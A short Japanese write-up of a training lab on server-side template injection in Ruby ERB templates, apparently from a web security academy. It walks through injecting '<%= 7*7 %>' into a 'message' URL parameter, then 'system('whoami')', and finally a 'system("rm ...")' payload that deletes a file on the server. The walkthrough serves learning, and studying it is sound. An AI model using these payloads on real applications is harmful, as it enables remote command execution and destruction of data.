Hello there, ('ω')ノ
基本的なサーバサイドのテンプレートインジェクションを。
このラボは、サーバサイドのテンプレートインジェクションに脆弱で。
ERBテンプレートの構築が安全でないのが原因で。
まずは、製品の詳細を表示しようとすると。
GET リクエストで、下記のmessageパラメータが表示されて。
Unfortunately this product is out of stock
URLのパラメータは下記の通りで。
https://acb81f041fbb063580e5041b00450007.web-security-academy.net/?message=Unfortunately%20this%20product%20is%20out%20of%20stock
リクエストボディは、下記のとおり。
ERBテンプレートについては、下記のサイト等を参考に。
https://www.stuartellis.name/articles/erb/
下記のペイロードをエンコードして。
<%= 7*7 %>
パラメータ値を置き換えると。
演算結果が表示されるので、脆弱性の可能性があると考えて。
下記のペイロードをエンコードしてSendするとコマンドが機能してて。
<%= system('whoami') %>
よって、下記のペイロードを作成してエンコードしてSendすると。
<%= system("rm /home/carlos/morale.txt") %>
クリアできた。
Best regards, (^^ゞ